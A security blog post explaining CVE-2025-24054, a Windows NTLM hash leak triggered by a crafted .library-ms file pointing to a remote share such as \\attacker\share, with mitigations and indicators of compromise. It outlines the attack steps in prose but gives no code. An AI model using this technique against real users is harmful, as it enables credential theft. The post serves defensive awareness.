Windows 10/11 NTLM Hash Disclosure Spoofing (CVE-2025-24054)
In October 2025, a new security vulnerability was disclosed affecting Windows 10 and Windows 11. Tracked as CVE-2025-24054, this flaw allows attackers to exploit .library-ms files to trigger NTLM hash disclosure. While this proof-of-concept (PoC) requires user interaction, it highlights ongoing risks around legacy authentication protocols in Windows environments.
This blog provides a technical breakdown, impact assessment, and mitigation strategies for organizations and security professionals.
What is CVE-2025-24054?
- Type of vulnerability: NTLM hash disclosure via spoofed
.library-msfiles. - Affected systems: Windows 10 (x64) and Windows 11 (x64).
- Attack vector: Malicious
.library-msfiles pointing to a remote UNC path. - Impact: When opened, Windows attempts to authenticate to the attacker-controlled share, leaking NTLM credentials.
How the Exploit Works
- Crafting the file A
.library-msXML file is generated with a<url>tag pointing to a UNC path such as\\attacker\share. - Packaging for delivery The file is often compressed into a ZIP archive for distribution.
- User interaction When the victim imports or opens the file, Windows automatically tries to connect to the UNC path.
- NTLM hash leakage During this connection attempt, NTLM authentication is triggered, exposing the user’s credentials to the attacker.
Proof-of-Concept Script
- Validation of target hostnames/IPs.
- Generation of
.library-msXML content. - Packaging into a ZIP archive.
- Optional dry-run mode for safe testing.
This script is intended for responsible disclosure and lab testing only.
Security Implications
- Credential theft: NTLM hashes can be captured and cracked offline.
- Lateral movement: Compromised credentials may allow attackers to move across systems.
- Social engineering risk: Attackers may disguise malicious files as legitimate resources.
Mitigation Strategies
To protect against CVE-2025-24054:
- Block outbound SMB traffic to untrusted networks.
- Disable NTLM authentication where possible; migrate to Kerberos.
- Apply Microsoft security updates once available.
- User awareness training: Educate employees not to open unknown
.library-msfiles. - Monitoring & detection: Watch for suspicious SMB traffic and
.library-msfile usage.
ndicators of Compromise
| Description | Value |
|---|---|
| Archive NTLM Exploits Bomb | 9ca72d969d7c5494a30e996324c6c0fcb72ae1ae |
| xd.website | 84132ae00239e15b50c1a20126000eed29388100 |
| xd.url | 76e93c97ffdb5adb509c966bca22e12c4508dcaa |
| xd.library-ms | 7dd0131dd4660be562bc869675772e58a1e3ac8e |
| xd.lnk | 5e42c6d12f6b51364b6bfb170f4306c5ce608b4f |
| NTLM Exploits Bomb Endpoint | 159.196.128[.]120 |
| Unzipped Exploits | 054784f1a398a35e0c5242cbfa164df0c277da73 7a43c177a582c777e258246f0ba818f9e73a69ab |
| Unzipped Campaign Endpoint | 194.127.179[.]157 |
Conclusion
The disclosure of CVE-2025-24054 underscores the risks of legacy authentication mechanisms like NTLM. While the exploit requires user interaction, attackers can weaponize social engineering to achieve credential theft. Organizations should act quickly to harden their environments, monitor for suspicious activity, and prepare for Microsoft’s official patch.
Reference : Microsoft
Follow Us On – X.com, Telegram, LinkedIN, Discord Server,
For The Latest Updates, Vulnerability Insights, Security News, Cyberattack Scoops And Cybersecurity Best Practices Delivered Straight To Your Inbox – Subscribe To Our Newsletter
